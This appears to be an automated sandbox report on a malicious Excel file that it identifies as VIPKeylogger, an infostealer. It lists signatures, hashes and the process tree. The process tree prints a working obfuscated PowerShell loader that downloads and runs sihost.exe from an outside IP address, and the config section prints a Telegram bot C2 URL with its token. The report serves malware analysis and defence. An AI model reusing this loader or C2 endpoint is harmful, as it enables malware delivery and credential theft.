Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 07:07

General

  • Target

    ALFATECH-4500068045.xls

  • Size

    331KB

  • MD5

    02b90b88aed63a901dbcb9f1c06e34c1

  • SHA1

    0744024e070c8840acf9f787c18d279c242d1734

  • SHA256

    a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d

  • SHA512

    b9394b6b59287940a94faceda10c584aae3155765e4bb88bbda4b04fe3bc23a1bf44951398ba723913c2c0c661a77c3efb6b000ff5a2efc312dc95c4bf81f901

  • SSDEEP

    6144:c/WOvPZ8NdyOseQAz1Wapbb2zIFhzBvxaLqRRZYj+oUzCJeYILmCL1P:IWOX+PsJAz1p9fhzBIqRR4+BYILt1

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7121690251:AAEuf5zFrwn6F6mTVPJTwU5P1nN1ULFLElA/sendMessage?chat_id=7071568333

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2556
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:112
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2912
        • C:\Users\Admin\AppData\Roaming\sihost.exe
          "C:\Users\Admin\AppData\Roaming\sihost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:264
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\sihost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:268

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          971c514f84bba0785f80aa1c23edfd79

          SHA1

          732acea710a87530c6b08ecdf32a110d254a54c8

          SHA256

          f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

          SHA512

          43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          0231a37c450fd71f499a766ae7cde4c1

          SHA1

          f7f3c7c55ef4a628173ea34e7697f8526b083d2b

          SHA256

          4e0dd896a5b11132d722b155cde5f03a61807583cc413bd91e04fc2c4ccc3dcd

          SHA512

          6bd6f7b8ff82f52eb754ab490a03453117e67973bcb53ed7233e167a663b26578b8b4da1a907bc99b535b3cb9294b0907e054eb427a0677898ebbc1adfc4bbf6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          183cf0f46c5d878b4da3706777d441a7

          SHA1

          662d0457e60699c16a3f4978c0f4d7a2fa41ee24

          SHA256

          54a5b037f119c7c72288e8938f3b0d1fb9be28ceee4712df639ebd1fec9bebb1

          SHA512

          0c79c1fdb6135dbd9845493fb8201e3a067f4ec831fdc05d7623435cc39ec492dabffa890d9626e0f3f2c575780312e502205fb94d7656e0438693a3412b4bfa

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          5c0c586fcc0295465e226ba96427cf97

          SHA1

          d52cd521b3847f56dfe33c4b858b86063a33a584

          SHA256

          5b698c684d3e08ec24433ea3bdecc350406f9b4934d4ec5d66b68e51d2f9a08d

          SHA512

          e71aa78a5a62fbdd763f4b6f0f741f68567504777b2aeff429c9ae51296d2d562e671ca95b793b53f67152443806ad956b3c9f6705a4fcf2a50323f5ddd025a4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\icreamnet[1].hta

          Filesize

          12KB

          MD5

          7103c506472571a74df192733c3a951f

          SHA1

          e33b0379480d8796cc6f076240e4bedd4ed491d3

          SHA256

          c71171c8f9e4481d14b506d2ae0c37ef7702e610e898bcf146c72523c86aec7f

          SHA512

          2f61230549b40684e797e044935bfe1fb74d969abf185087aebd2b8f9cffdefb09bef7eeb381d8ce492e877eae00131405eb961e284a0c87f76b819dafc759b5

        • C:\Users\Admin\AppData\Local\Temp\Cab81FC.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp

          Filesize

          1KB

          MD5

          9fc4d43938ebb2a9c1a6a5c9e8e1b7da

          SHA1

          2cccc89f39e676854fa9c81b591f0c5ea154b97f

          SHA256

          27838d11900ed1b250a86cc776bc5edba978128c944a371065c74c00a4cbd153

          SHA512

          32b4fbbd96fe1b6fddd3427ec725f3cb5684fec095d4107dbd9bcfddfc5256d4f5a13879f57901299ef9ef0c0c4229158467398fc16b106c6f4515716f34890e

        • C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.dll

          Filesize

          3KB

          MD5

          69329fad78578ff7b1c18ab40d90f650

          SHA1

          22be61573dba4a668eb79dcf447185d3b966678d

          SHA256

          2376de8780975313d031cf80e11904d5c23bc2d70701e6b59515824b6e20eee4

          SHA512

          227c108cb1e3e594ddb12dad2ef8b4a3a9a7b4797b495f78073ac7708bf82094409ba59b28f21d625c15117714525c701578ddf8d60ec4d440167c2c1ced1115

        • C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.pdb

          Filesize

          7KB

          MD5

          16cfde2da53cade58911abeebc95cbe8

          SHA1

          f0b8a9b295d92f515044a6f59e6247fca8cf6091

          SHA256

          3b3e179c787f21c82988759e6f801dc1091190e78d01edcff64f2382e966acf7

          SHA512

          4fd6cc9b4f9790a5bc9fea1fd336ff2fec82ca8f36bd2fc7cec3282c47fa24c0e6e074e906683edc61255006b4026f32579f58a68ed38f93d9ae2a92f3ebe510

        • C:\Users\Admin\AppData\Roaming\sihost.exe

          Filesize

          707KB

          MD5

          cf7c1cb71ad11a8c4ab07ffc3afa2f67

          SHA1

          68c5f1c0e97237c4fff232e099353792b160df1a

          SHA256

          6eb12a217689847fa90ae6ac61401fe0349653808da3e4386abf01ee4f56e2f9

          SHA512

          997d7e6bcd9aa8ac33f6bb667edfe40efc522f47dd54284895b15736edb86052284409a3a6a9ab1c9e9066f507599a1824cf6a935849cb7346e2464c90ccb904

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp

          Filesize

          652B

          MD5

          7b62578350fbc3e85a2c8ee625ad270f

          SHA1

          e1454131de8f74f5d918b719903122ca29ee2fb3

          SHA256

          852cc899d42c51ca2c327c5775481ca7bba3e075e670794fa8964973fbebd554

          SHA512

          ae891dc02a7efdb525ad3c7e36cb23cf61768da2871200c58914b175bcac598c5215acafc14788bf60c3fe3289946f0c35395d435d8405df8928dd4339a7186a

        • \??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.0.cs

          Filesize

          473B

          MD5

          602090135e2e0d9cd49e6059ebe19206

          SHA1

          aff8001ee39f6d2b36cd1b74f87c22b152c55580

          SHA256

          b4f6cf69835c797d9964ff6ed7bd8223ade6e4c80053ee0659d2cf6d1fd4c8b9

          SHA512

          664b7d40c32eaa692af57d2afdc4f0235c8062b354177d490868dce23b1b91bae33ad567b8a700a9c50e66fa507a1a9404faba92bfec26c4dfa21425ea5c83e1

        • \??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline

          Filesize

          309B

          MD5

          fa15298a795e8bfc3b0cb550e623c67c

          SHA1

          a33e468fb287322ac76c443884ab2ce769211277

          SHA256

          9ca437fe90a7d431850a3364d39cc66a981baa00ec91901b221a4a0d6f515489

          SHA512

          9814e53d180703a03673ca6721f52f8a6d2051362e53994992d26f745af71d5061c9e4c1d1d407afed7dc603e014b73b8df51706b9c316440a92a4e52abef29a

        • memory/264-65-0x00000000008A0000-0x0000000000A2D000-memory.dmp

          Filesize

          1.6MB

        • memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp

          Filesize

          1.6MB

        • memory/268-133-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-119-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-84-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-85-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-105-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-78-0x0000000000400000-0x0000000000441000-memory.dmp

          Filesize

          260KB

        • memory/268-79-0x0000000000400000-0x0000000000441000-memory.dmp

          Filesize

          260KB

        • memory/268-121-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-82-0x0000000000550000-0x00000000005B0000-memory.dmp

          Filesize

          384KB

        • memory/268-83-0x00000000005C0000-0x000000000061E000-memory.dmp

          Filesize

          376KB

        • memory/268-91-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-103-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-127-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-141-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-139-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-137-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-135-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-131-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-129-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-125-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-123-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-87-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-117-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-115-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-113-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-111-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-109-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-107-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-101-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-99-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-97-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-95-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-93-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/268-89-0x00000000005C0000-0x0000000000618000-memory.dmp

          Filesize

          352KB

        • memory/2128-63-0x0000000006B70000-0x0000000006CFD000-memory.dmp

          Filesize

          1.6MB

        • memory/2556-19-0x0000000002390000-0x0000000002392000-memory.dmp

          Filesize

          8KB

        • memory/2556-1-0x000000007232D000-0x0000000072338000-memory.dmp

          Filesize

          44KB

        • memory/2556-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2556-61-0x000000007232D000-0x0000000072338000-memory.dmp

          Filesize

          44KB

        • memory/2556-1178-0x000000007232D000-0x0000000072338000-memory.dmp

          Filesize

          44KB

        • memory/2944-18-0x0000000000FE0000-0x0000000000FE2000-memory.dmp

          Filesize

          8KB